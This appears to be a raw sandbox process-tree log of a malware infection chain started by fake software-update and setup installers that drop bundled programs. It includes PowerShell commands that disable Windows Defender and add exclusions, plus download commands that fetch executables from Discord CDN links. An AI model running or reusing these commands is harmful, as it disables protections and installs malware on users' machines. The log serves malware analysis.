C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=606x8208c5e16842608234b91821ef4b1c3f AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ZH8xtvo4\oAKAmWkbAngMjKcBt.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ZH8xtvo4\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634531721 /quiet SILENT=1 AF=606x8208c5e16842608234b91821ef4b1c3f " AF="606x8208c5e16842608234b91821ef4b1c3f" AI_EXTEND_GLASS="26"5⤵
-
C:\Users\Admin\AppData\Local\Temp\IyeciJio\vpn.exeC:\Users\Admin\AppData\Local\Temp\IyeciJio\vpn.exe /silent /subid=510x8208c5e16842608234b91821ef4b1c3f4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-GOVD6.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-GOVD6.tmp\vpn.tmp" /SL5="$40286,15170975,270336,C:\Users\Admin\AppData\Local\Temp\IyeciJio\vpn.exe" /silent /subid=510x8208c5e16842608234b91821ef4b1c3f5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "6⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09017⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "6⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09017⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies system certificate store
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 6076792F8FAE51033604C8B6B14224A7 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 4BA0A3F9CC808604D8E09BC1EFBAF7012⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12912263469836d.exeThu12912263469836d.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12912263469836d.exeC:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12912263469836d.exe4⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=606x8208c5e16842608234b91821ef4b1c3f -BF=default -uncf=default3⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--U4miRxC"4⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exeC:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1e8,0x1ec,0x1f0,0x1c4,0x1f4,0x7ffdb6219ec0,0x7ffdb6219ed0,0x7ffdb6219ee05⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exeC:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x154,0x158,0x15c,0x130,0x160,0x7ff685704e60,0x7ff685704e70,0x7ff685704e806⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --mojo-platform-channel-handle=1772 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --mojo-platform-channel-handle=2084 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1712 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2576 /prefetch:15⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --mojo-platform-channel-handle=3136 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=2040 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --mojo-platform-channel-handle=3500 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --mojo-platform-channel-handle=3524 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1384 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=3436 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --mojo-platform-channel-handle=1664 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1668 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --mojo-platform-channel-handle=1676 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=2704 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=2188 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=2324 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=3396 /prefetch:25⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_25D5.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites' -retry_count 10"3⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 8D0B1522903E88C526AC7B70E3FE81A1 C2⤵
-
C:\Users\Admin\Desktop\Software-update-patc_988440081.exe"C:\Users\Admin\Desktop\Software-update-patc_988440081.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-MPS5N.tmp\Software-update-patc_988440081.tmp"C:\Users\Admin\AppData\Local\Temp\is-MPS5N.tmp\Software-update-patc_988440081.tmp" /SL5="$3022E,4479401,466944,C:\Users\Admin\Desktop\Software-update-patc_988440081.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\Desktop\Software-update-patc_988440081.exe"C:\Users\Admin\Desktop\Software-update-patc_988440081.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-JQGGL.tmp\Software-update-patc_988440081.tmp"C:\Users\Admin\AppData\Local\Temp\is-JQGGL.tmp\Software-update-patc_988440081.tmp" /SL5="$602B0,4479401,466944,C:\Users\Admin\Desktop\Software-update-patc_988440081.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{281517df-404b-4746-8814-625baa710267}\oemvista.inf" "9" "4d14a44ff" "0000000000000168" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000178"2⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Checks SCSI registry key(s)
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Desktop\Software-update-patc_612604768.exe"C:\Users\Admin\Desktop\Software-update-patc_612604768.exe"1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-EHPSJ.tmp\Software-update-patc_612604768.tmp"C:\Users\Admin\AppData\Local\Temp\is-EHPSJ.tmp\Software-update-patc_612604768.tmp" /SL5="$8005C,4477466,466944,C:\Users\Admin\Desktop\Software-update-patc_612604768.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Dolore\quia\Quibusdam.exe"C:\Program Files (x86)\Dolore/\quia\Quibusdam.exe" 2fe3d428284ff9b385bc1c941892777b3⤵
-
C:\Users\Admin\Desktop\Software-update-patc_612604768.exe"C:\Users\Admin\Desktop\Software-update-patc_612604768.exe"1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-S8B23.tmp\Software-update-patc_612604768.tmp"C:\Users\Admin\AppData\Local\Temp\is-S8B23.tmp\Software-update-patc_612604768.tmp" /SL5="$B015A,4477466,466944,C:\Users\Admin\Desktop\Software-update-patc_612604768.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Dolore\quia\Quibusdam.exe"C:\Program Files (x86)\Dolore/\quia\Quibusdam.exe" 2fe3d428284ff9b385bc1c941892777b3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\NEzcHQw3\D1mhFu3.exeC:\Users\Admin\AppData\Local\Temp\NEzcHQw3\D1mhFu3.exe /qn CAMPAIGN="642"4⤵
-
C:\Users\Admin\AppData\Local\Temp\D1npRy0m\ugRrXBaN9Ln.exeC:\Users\Admin\AppData\Local\Temp\D1npRy0m\ugRrXBaN9Ln.exe /usthree SUB=2fe3d428284ff9b385bc1c941892777b4⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Users\Admin\Desktop\setup_x86_x64_install.exe"C:\Users\Admin\Desktop\setup_x86_x64_install.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS80611967\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS80611967\setup_install.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu128b511c77e8c.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu128b511c77e8c.exeThu128b511c77e8c.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu128b511c77e8c.exeC:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu128b511c77e8c.exe6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu123e05ebe43921.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu123e05ebe43921.exeThu123e05ebe43921.exe5⤵
-
C:\Users\Admin\Pictures\Adobe Films\3kfj0Nbmsl0rYgrxVLxx3JZG.exe"C:\Users\Admin\Pictures\Adobe Films\3kfj0Nbmsl0rYgrxVLxx3JZG.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\Zux_SxADRFzQSUmHwDWetZRy.exe"C:\Users\Admin\Pictures\Adobe Films\Zux_SxADRFzQSUmHwDWetZRy.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\Zux_SxADRFzQSUmHwDWetZRy.exe"C:\Users\Admin\Pictures\Adobe Films\Zux_SxADRFzQSUmHwDWetZRy.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\OYP2ihecVJW8nxWNWwhVKaRC.exe"C:\Users\Admin\Pictures\Adobe Films\OYP2ihecVJW8nxWNWwhVKaRC.exe"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd7⤵
-
C:\Users\Admin\Pictures\Adobe Films\uKDJ0eG25STznzqV4pxyS0ZR.exe"C:\Users\Admin\Pictures\Adobe Films\uKDJ0eG25STznzqV4pxyS0ZR.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\UsrPEUzowSHUO7MKAtC7TWdY.exe"C:\Users\Admin\Pictures\Adobe Films\UsrPEUzowSHUO7MKAtC7TWdY.exe"6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B09A.tmp\B09B.tmp\B09C.bat "C:\Users\Admin\Pictures\Adobe Films\UsrPEUzowSHUO7MKAtC7TWdY.exe""7⤵
-
C:\Users\Admin\AppData\Local\Temp\B09A.tmp\B09B.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\B09A.tmp\B09B.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""8⤵
-
C:\Users\Admin\AppData\Local\Temp\B09A.tmp\B09B.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\B09A.tmp\B09B.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/900686571064414231/900686587866804244/18.exe" "18.exe" "" "" "" "" "" ""8⤵
-
C:\Users\Admin\AppData\Local\Temp\B09A.tmp\B09B.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\B09A.tmp\B09B.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/900686571064414231/900686616924925982/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""8⤵
-
C:\Users\Admin\AppData\Local\Temp\10532\Transmissibility.exeTransmissibility.exe8⤵
-
C:\Users\Admin\AppData\Local\Temp\B09A.tmp\B09B.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\B09A.tmp\B09B.tmp\extd.exe "" "" "" "" "" "" "" "" ""8⤵
-
C:\Users\Admin\Pictures\Adobe Films\F1zaSM4ruX6Op1wKx8ZRdYlM.exe"C:\Users\Admin\Pictures\Adobe Films\F1zaSM4ruX6Op1wKx8ZRdYlM.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\F1zaSM4ruX6Op1wKx8ZRdYlM.exe"C:\Users\Admin\Pictures\Adobe Films\F1zaSM4ruX6Op1wKx8ZRdYlM.exe"7⤵
-
